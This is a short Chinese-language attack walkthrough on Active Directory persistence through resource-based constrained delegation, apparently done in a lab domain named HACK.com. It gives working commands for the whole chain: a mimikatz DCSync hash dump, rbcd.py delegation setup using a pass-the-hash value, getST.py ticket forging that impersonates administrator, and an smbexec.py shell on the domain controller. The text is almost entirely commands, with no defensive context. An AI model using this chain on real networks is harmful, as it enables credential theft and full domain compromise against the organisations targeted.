域内委派维权

为某个服务账户配置 krbtgt 用户的非约束性委派或基于资源的约束性委派。这里我的 krbtgt 的基于资源约束性委派我利用不了，所以使用的是域控的机器账户 dc01$ 进行维权。

抓取所有 hash。

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:HACK.com /user:HACK\administrator /csv" "exit"
​
这里很多账号都是如下 hash，是因为他们的密码都是一样的。
9099d68602a60f007c227c4fa95fada6
9099d68602a60f007c227c4fa95fada6

给机器账户 dc01$ 配置 machine$ 的基于资源的约束性委派

python ./rbcd.py -f comp1 -t dc01 -dc-ip 192.168.72.21 HACKER\\administrator -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6

以 administrator 请求 cifs/dc01.HACK.com 票据

# 以 administrator 请求 cifs/dc01.HACK.com 票据
python3 getST.py -dc-ip 192.168.72.21 HACK.com/machine$ -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 -spn cifs/dc01.HACK.com -impersonate administrator
​
export KRB5CCNAME=administrator@cifs_dc01.HACK.com@HACK.COM.ccache
​
python3 smbexec.py -no-pass -k dc01.HACK.com